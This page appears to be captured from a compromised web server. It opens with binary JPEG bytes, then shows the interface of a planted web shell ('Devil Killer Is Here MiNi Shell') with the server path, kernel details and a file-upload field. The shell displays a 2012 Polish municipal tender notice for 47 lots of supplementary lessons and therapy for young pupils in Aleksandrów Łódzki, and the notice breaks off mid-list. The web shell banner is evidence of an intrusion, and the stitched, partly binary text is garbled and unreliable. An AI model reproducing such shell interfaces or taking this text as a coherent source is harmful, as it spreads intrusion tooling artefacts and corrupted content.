JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/64494-N-2012.html

<p class="kh_header"><b>Aleksandrów Łódzki: Usługa edukacyjna w ramach programu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych pt. Przez doskonalenie i rozwijanie - do sukcesu współfinansowanego przez Unię Europejską ze środków Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 64494 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Aleksandrów Łódzki , Pl. Kościuszki 2, 95-070 Aleksandrów Łódzki, woj. łódzkie, tel. 042 7121018, 7121620, faks 042 7121780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aleksandrow-lodzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna w ramach programu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych pt. Przez doskonalenie i rozwijanie - do sukcesu współfinansowanego przez Unię Europejską ze środków Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące prowadzenie zajęć dla uczniów klas I-III szkół podstawowych, dla których organem prowadzącym jest Gmina Aleksandrów Łódzki, w ramach projektu Przez doskonalenie i rozwijanie - do sukcesu.
Zajęcia w Szkole Podstawowej z oddziałami integracyjnymi im. J. Korczaka w Rudzie Bugaj.

Część zamówienia nr 1: zajęcia dla dzieci z trudnościami w czytaniu i pisaniu. Liczba grup: 3. Liczba nauczycieli: 3 po jednym dla każdej grupy.  Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 2: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba grup: 3. Liczba nauczycieli: 3 po jednym dla każdej grupy.  Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 3: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba grup: 3. Liczba nauczycieli: 1 dla 3 grup.  Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 4: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 5: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie -zajęcia muzyczno-wokalne. Liczba grup: 1. Liczba nauczycieli: 1.  Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.

Zajęcia w Szkole Podstawowej im. Ks. Stefana Kardynała Wyszyńskiego Prymasa Tysiąclecia w Rąbieniu.
Część zamówienia nr 6A, 6B: zajęcia dla dzieci z trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Liczba grup: 3 w roku szkolnym 2011/2012, 6 w roku szkolnym 2012/2013. Liczba nauczycieli: 22 dla całej części (po jednym dla każdej części oznaczonej literami A, B). Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 7: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba grup: 2. Liczba nauczycieli: 2 po jednym dla każdej grupy.  Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 8: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba grup: 4. Liczba nauczycieli: 1 dla 4 grup.  Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 9: zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy. Liczba grup: 2. Liczba nauczycieli: 1 dla 2 grup.  Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 10: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych. Liczba grup: 2. Liczba nauczycieli: 1 -dla 2 grup.  Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 11: zajęcia rozwijające zainteresowania uczniów uzdolnionych artystycznie - zajęcia plastyczne. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 12: zajęcia rozwijające zainteresowania uczniów uzdolnionych artystycznie - zajęcia teatralne. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla  grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.

Zajęcia w Szkole Podstawowej im. Ryszarda Wyrzykowskiego w Bełdowie.
Część zamówienia nr 13: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 14: zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy. Liczba grup: 2. Liczba nauczycieli: 2- po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 15: terapia pedagogiczna. Liczba grup: 2. Liczba nauczycieli: 1 dla 2grup. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 16: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 17: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - zajęcia filmowo-przyrodnicze . Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 18	:zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych humanistycznie. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.

Zajęcia w Sportowej Szkole Podstawowej nr 3 im. Józefa Jaworskiego
w Aleksandrowie Łódzkim.
Część zamówienia nr 19: zajęcia dla dzieci z trudnościami w czytaniu i pisaniu. Liczba grup: 5. Liczba nauczycieli: 5 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 20: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 21: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba grup: 6. Liczba nauczycieli: 2 - po jednym dla 3 grup. Liczba godzin dla każdej  grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 22: zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacyjnymi. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 23: terapia pedagogiczna. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 24: zajęcia rozwijające zainteresowania uczniów ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych . Liczba grup: 3. Liczba nauczycieli: 3 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 25: zajęcia rozwijające zainteresowania uczniów ze szczególnym uwzględnieniem nauk humanistycznych. Liczba grup: 3. Liczba nauczycieli: 3 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 26: zajęcia rozwijające zainteresowania uczniów uzdolnionych artystycznie - zajęcia plastyczne. Liczba grup: 3. Liczba nauczycieli: 3 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.

Zajęcia w Miejskim Zespole Szkół im. Jana Pawła II w Aleksandrowie Łódzkim. Szkoła Podstawowa Nr 1 w Aleksandrowie Łódzkim.
Część zamówienia nr 27: zajęcia dla dzieci z trudnościami w czytaniu i pisaniu. Liczba grup: 3. Liczba nauczycieli: 3 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 28: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba grup: 3. Liczba nauczycieli: 3 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 29: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba grup: 4. Liczba nauczycieli: 1 - dla 4 grup. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 30: zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacyjnymi. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 31: zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy. Liczba grup: 2. Liczba nauczycieli: 2 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 32: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych. Liczba grup: 3. Liczba nauczycieli: 3 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 33: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - zajęcia komputerowo-informatyczne. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 34: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie humanistycznym. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 35: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie. Liczba grup: 2. Liczba nauczycieli: 1 - dla 2 grup. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 36: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie - zajęcia sportowe. Liczba grup: 2. Liczba nauczycieli: 1 - dla 2 grup. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.

Szkoła Podstawowa nr 4 im. Marii Skłodowskiej -Curie w Aleksandrowie Łódzkim.
Część zamówienia nr 37: zajęcia dla dzieci z trudnościami w czytaniu i pisaniu. Liczba grup: 9. Liczba nauczycieli: 9 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 38: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba grup: 3. Liczba nauczycieli: 3 - po jednym dla każdej grupy. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 39: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba grup: 4. Liczba nauczycieli: 1 - dla 4 grup. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 40: zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacyjnymi. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 41: zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy. Liczba grup: 6. Liczba nauczycieli: 2 - po jednym dla 3 grup. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 42: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych. Liczba grup: 2. Liczba nauczycieli: 2 - po jednym dla każdej grup. Liczba godzin dla każdej grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 43: zajęcia rozwijające zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych - zajęcia informatyczne. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 44: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie humanistycznym. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 45: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie - zajęcia plastyczne. Liczba grup: 1. Liczba nauczycieli: 1 . Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 46: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie -zajęcia muzyczne. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013.
Część zamówienia nr 47: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie -zajęcia taneczne. Liczba grup: 1. Liczba nauczycieli: 1. Liczba godzin dla grupy: 30h w roku szkolnym 2011-2012, 30h w roku szkolnym 2012-2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówienia uzupełniającego, zgodnie z art. 67 ust. 1 pkt 6 ustawy PZP:
-w przypadku zmian zasad projektu Przez doskonalenie i rozwijanie - do sukcesu wprowadzonych przez Instytucję Zarządzającą Programem Operacyjnym Kapitał Ludzki.
-Przedmiotem ewentualnych zamówień uzupełniających będzie wykonanie usług objętych przedmiotem zamówienia.
-Wartość usługi uzupełniającej nie może przekroczyć 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 47.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia zgodnie z wymogiem art. 22 ust. 1 ustawy Prawo zamówień publicznych. (oświadczenia - stanowiące załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest posiadanie wiedzy i doświadczenia. Weryfikacja spełnienia warunku będzie następować w oparciu o posiadanie kwalifikacji i umiejętności. Kwalifikacje dla odpowiedniej części zamówienia muszą być zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz.U. z 2009r Nr 50, poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli. Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia zgodnie z wymogiem art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie - stanowiące załącznik nr 2 i nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia zgodnie z wymogiem art. 22 ust. 1 ustawy Prawo zamówień publicznych.(oświadczenie - stanowiące załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zajęć dla dzieci z trudnościami w nauce czytania i pisania oraz dysleksji: 
Część: 1 -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna z pedagogiką wspierającą lub terapią pedagogiczną, bądź filologia polska z pedagogiką wspierającą lub terapią pedagogiczną; z min. rocznym doświadczeniem w nauczaniu. 
Część: 6A, 6B, 19, 27, 37 -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub terapia pedagogiczna dające kwalifikacje do nauczania w klasach I-III szkoły podstawowej z min. rocznym doświadczeniem w nauczaniu. 

W zakresie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych: 
Część: 2 -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna z pedagogiką wspierającą lub terapią pedagogiczną, dające kwalifikacje do nauczania w klasach I-III szkoły podstawowej, z min. rocznym doświadczeniem w nauczaniu.
Części: 7, 14, 20, 28, 38 -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wieku dziecięcego, dające kwalifikacje do nauczania w klasach I-III szkoły podstawowej z min. rocznym doświadczeniem w nauczaniu. 

W zakresie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy: 
Część: 3 -
ukończone studia magisterskie z pedagogiki specjalnej (oligofrenopedagogiki) i logopedii, z min. rocznym doświadczeniem w pracy z dziećmi.
Części: 8, 13, 21, 29, 39 -
ukończone studia magisterskie lub studia podyplomowe w zakresie logopedii oraz przygotowanie pedagogiczne; z min. rocznym doświadczeniem w pracy z dziećmi.

W zakresie zajęć socjoterapeutycznych dla dzieci z zaburzeniami komunikacji społecznej:
Części: 22, 30, 40 -
wykształcenie wyższe w zakresie socjoterapii lub pedagogiki specjalnej i pedagogiki resocjalizacyjnej studium kwalifikacyjne terapii dzieci ze specjalnymi trudnościami w uczeniu się, studia podyplomowe terapia przez edukację artystyczną lub z pomocy psychologiczno-pedagogicznej lub terapii pedagogicznej; z min. rocznym doświadczeniem w pracy z dziećmi.

W zakresie zajęć z terapii pedagogicznej: 
Części: 15, 23 -
wykształcenie wyższe i studia podyplomowe w zakresie terapii pedagogicznej lub kurs kwalifikacyjny - terapia pedagogiczna, z min. rocznym doświadczeniem w pracy z dziećmi.

W zakresie zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy:
Części: 9, 14, 31, 41 -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w szkole podstawowej i uprawnienia do prowadzenia gimnastyki korekcyjnej lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe lub kurs kwalifikacyjny w zakresie gimnastyki korekcyjnej, z min. rocznym doświadczeniem w pracy z dziećmi.

W zakresie zajęć dla dzieci szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych:
Część: 4
 - zajęcia: doświadczenia i eksperymenty przyrodnicze z uwzględnieniem zagadnień fizyczno-chemicznych wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, studia z zakresu fizyki i chemii; z min. rocznym doświadczeniem w nauczaniu.
Części: 10, 16, 24, 32, 42 - zajęcia matematyczne -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna, z min. rocznym doświadczeniem w nauczaniu. 
Część: 17 - zajęcia filmowo-przyrodnicze -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolnej oraz wykształcenie w zakresie operatora filmowego lub reżyserskie, z min. rocznym doświadczeniem w nauczaniu.
Części: 33, 43 - zajęcia komputerowo-informatyczne -
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna oraz wykształcenie w zakresie informatyki, z min. rocznym doświadczeniem w nauczaniu.

W zakresie zajęć dla dzieci szczególnie uzdolnionych w zakresie humanistycznym:
Części: 18, 25, 34
wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym - edukacja wczesnoszkolna lub pedagogika wczesnoszkolna, z min. rocznym doświadczeniem w nauczaniu 

W zakresie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie: 
część: 11 - zajęcia wokalno-muzyczne -
